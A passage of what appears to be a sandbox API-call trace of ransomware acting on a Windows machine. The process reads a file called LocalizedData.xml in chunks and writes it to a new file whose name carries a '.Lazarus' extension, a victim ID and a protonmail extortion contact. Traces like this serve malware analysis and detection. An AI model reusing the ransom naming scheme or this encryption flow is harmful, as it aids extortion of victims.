hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0072.149] AreFileApisANSI () returned 1 [0072.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0072.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.150] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e)) returned 1 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.150] AreFileApisANSI () returned 1 [0072.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.150] GetLastError () returned 0x0 [0072.150] SetLastError (dwErrCode=0x0) [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e148 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0072.150] GetLastError () returned 0x0 [0072.150] SetLastError (dwErrCode=0x0) [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b110 [0072.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.151] AreFileApisANSI () returned 1 [0072.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0072.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x80a30 [0072.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b110, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0072.151] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.151] GetFileType (hFile=0x418) returned 0x1 [0072.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0072.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.151] AreFileApisANSI () returned 1 [0072.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0072.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.152] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.152] GetFileType (hFile=0x410) returned 0x1 [0072.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.152] GetLastError () returned 0x0 [0072.152] SetLastError (dwErrCode=0x0) [0072.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.152] GetLastError () returned 0x0 [0072.152] SetLastError (dwErrCode=0x0) [0072.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.152] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0072.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.154] GetLastError () returned 0x0 [0072.154] SetLastError (dwErrCode=0x0) [0072.154] GetLastError () returned 0x0 [0072.155] SetLastError (dwErrCode=0x0) [0072.155] GetLastError () returned 0x0 [0072.155] SetLastError (dwErrCode=0x0) [0072.155] GetLastError () returned 0x0 [0072.155] SetLastError (dwErrCode=0x0) [0072.155] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.156] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.157] GetLastError () returned 0x0 [0072.157] SetLastError (dwErrCode=0x0) [0072.157] GetLastError () returned 0x0 [0072.157] SetLastError (dwErrCode=0x0) [0072.157] GetLastError () returned 0x0 [0072.157] SetLastError (dwErrCode=0x0) [0072.157] GetLastError () returned 0x0 [0072.157] SetLastError (dwErrCode=0x0) [0072.157] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.157] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.158] GetLastError () returned 0x0 [0072.158] SetLastError (dwErrCode=0x0) [0072.158] GetLastError () returned 0x0 [0072.158] SetLastError (dwErrCode=0x0) [0072.158] GetLastError () returned 0x0 [0072.158] SetLastError (dwErrCode=0x0) [0072.158] GetLastError () returned 0x0 [0072.158] SetLastError (dwErrCode=0x0) [0072.158] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.158] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.159] GetLastError () returned 0x0 [0072.159] SetLastError (dwErrCode=0x0) [0072.159] GetLastError () returned 0x0 [0072.159] SetLastError (dwErrCode=0x0) [0072.159] GetLastError () returned 0x0 [0072.159] SetLastError (dwErrCode=0x0) [0072.159] GetLastError () returned 0x0 [0072.159] SetLastError (dwErrCode=0x0) [0072.159] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.159] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.160] GetLastError () returned 0x0 [0072.160] SetLastError (dwErrCode=0x0) [0072.160] GetLastError () returned 0x0 [0072.160] SetLastError (dwErrCode=0x0) [0072.160] GetLastError () returned 0x0 [0072.160] SetLastError (dwErrCode=0x0) [0072.160] GetLastError () returned 0x0 [0072.160] SetLastError (dwErrCode=0x0) [0072.160] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.160] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.160] GetLastError () returned 0x0 [0072.160] SetLastError (dwErrCode=0x0) [0072.161] GetLastError () returned 0x0 [0072.161] SetLastError (dwErrCode=0x0) [0072.161] GetLastError () returned 0x0 [0072.161] SetLastError (dwErrCode=0x0) [0072.161] GetLastError () returned 0x0 [0072.161] SetLastError (dwErrCode=0x0) [0072.161] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.161] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.161] GetLastError () returned 0x0 [0072.161] SetLastError (dwErrCode=0x0) [0072.161] GetLastError () returned 0x0 [0072.161] SetLastError (dwErrCode=0x0) [0072.162] GetLastError () returned 0x0 [0072.162] SetLastError (dwErrCode=0x0) [0072.162] GetLastError () returned 0x0 [0072.162] SetLastError (dwErrCode=0x0) [0072.162] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.162] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.162] GetLastError () returned 0x0 [0072.162] SetLastError (dwErrCode=0x0) [0072.162] GetLastError () returned 0x0 [0072.162] SetLastError (dwErrCode=0x0) [0072.162] GetLastError () returned 0x0 [0072.162] SetLastError (dwErrCode=0x0) [0072.163] GetLastError () returned 0x0 [0072.163] SetLastError (dwErrCode=0x0) [0072.163] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.163] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.163] GetLastError () returned 0x0 [0072.163] SetLastError (dwErrCode=0x0) [0072.163] GetLastError () returned 0x0 [0072.163] SetLastError (dwErrCode=0x0) [0072.163] GetLastError () returned 0x0 [0072.163] SetLastError (dwErrCode=0x0) [0072.163] GetLastError () returned 0x0 [0072.163] SetLastError (dwErrCode=0x0) [0072.164] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.164] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.164] GetLastError () returned 0x0 [0072.164] SetLastError (dwErrCode=0x0) [0072.164] GetLastError () returned 0x0 [0072.165] SetLastError (dwErrCode=0x0) [0072.165] GetLastError () returned 0x0 [0072.165] SetLastError (dwErrCode=0x0) [0072.165] GetLastError () returned 0x0 [0072.165] SetLastError (dwErrCode=0x0) [0072.165] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.165] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.165] GetLastError () returned 0x0 [0072.165] SetLastError (dwErrCode=0x0) [0072.165] GetLastError () returned 0x0 [0072.165] SetLastError (dwErrCode=0x0) [0072.166] GetLastError () returned 0x0 [0072.166] SetLastError (dwErrCode=0x0) [0072.166] GetLastError () returned 0x0 [0072.166] SetLastError (dwErrCode=0x0) [0072.166] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.166] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.166] GetLastError () returned 0x0 [0072.166] SetLastError (dwErrCode=0x0) [0072.166] GetLastError () returned 0x0 [0072.166] SetLastError (dwErrCode=0x0) [0072.166] GetLastError () returned 0x0 [0072.166] SetLastError (dwErrCode=0x0) [0072.167] GetLastError () returned 0x0 [0072.167] SetLastError (dwErrCode=0x0) [0072.167] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.167] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.167] GetLastError () returned 0x0 [0072.167] SetLastError (dwErrCode=0x0) [0072.167] GetLastError () returned 0x0 [0072.167] SetLastError (dwErrCode=0x0) [0072.167] GetLastError () returned 0x0 [0072.167] SetLastError (dwErrCode=0x0) [0072.167] GetLastError () returned 0x0 [0072.167] SetLastError (dwErrCode=0x0) [0072.168] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.168] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.168] GetLastError () returned 0x0 [0072.168] SetLastError (dwErrCode=0x0) [0072.168] GetLastError () returned 0x0 [0072.168] SetLastError (dwErrCode=0x0) [0072.168] GetLastError () returned 0x0 [0072.168] SetLastError (dwErrCode=0x0) [0072.168] GetLastError () returned 0x0 [0072.168] SetLastError (dwErrCode=0x0) [0072.168] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.169] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.169] GetLastError () returned 0x0 [0072.169] SetLastError (dwErrCode=0x0) [0072.169] GetLastError () returned 0x0 [0072.169] SetLastError (dwErrCode=0x0) [0072.169] GetLastError () returned 0x0 [0072.169] SetLastError (dwErrCode=0x0) [0072.169] GetLastError () returned 0x0 [0072.169] SetLastError (dwErrCode=0x0) [0072.169] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.170] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.170] GetLastError () returned 0x0 [0072.170] SetLastError (dwErrCode=0x0) [0072.170] GetLastError () returned 0x0 [0072.170] SetLastError (dwErrCode=0x0) [0072.170] GetLastError () returned 0x0 [0072.170] SetLastError (dwErrCode=0x0) [0072.170] GetLastError () returned 0x0 [0072.170] SetLastError (dwErrCode=0x0) [0072.170] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.170] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.171] GetLastError () returned 0x0 [0072.171] SetLastError (dwErrCode=0x0) [0072.171] GetLastError () returned 0x0 [0072.171] SetLastError (dwErrCode=0x0) [0072.171] GetLastError () returned 0x0 [0072.171] SetLastError (dwErrCode=0x0) [0072.171] GetLastError () returned 0x0 [0072.171] SetLastError (dwErrCode=0x0) [0072.171] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.171] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.333] GetLastError () returned 0x0 [0072.333] SetLastError (dwErrCode=0x0) [0072.333] GetLastError () returned 0x0 [0072.333] SetLastError (dwErrCode=0x0) [0072.333] GetLastError () returned 0x0 [0072.333] SetLastError (dwErrCode=0x0) [0072.333] GetLastError () returned 0x0 [0072.333] SetLastError (dwErrCode=0x0) [0072.334] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.334] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.334] GetLastError () returned 0x0 [0072.334] SetLastError (dwErrCode=0x0) [0072.334] GetLastError () returned 0x0 [0072.334] SetLastError (dwErrCode=0x0) [0072.334] GetLastError () returned 0x0 [0072.334] SetLastError (dwErrCode=0x0) [0072.334] GetLastError () returned 0x0 [0072.334] SetLastError (dwErrCode=0x0) [0072.334] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x97e, lpOverlapped=0x0) returned 1 [0072.335] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.335] GetLastError () returned 0x0 [0072.335] SetLastError (dwErrCode=0x0) [0072.335] GetLastError () returned 0x0 [0072.335] SetLastError (dwErrCode=0x0) [0072.335] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.335] GetLastError () returned 0x0 [0072.335] SetLastError (dwErrCode=0x0) [0072.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d738 [0072.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0072.335] GetLastError () returned 0x0 [0072.335] SetLastError (dwErrCode=0x0) [0072.336] 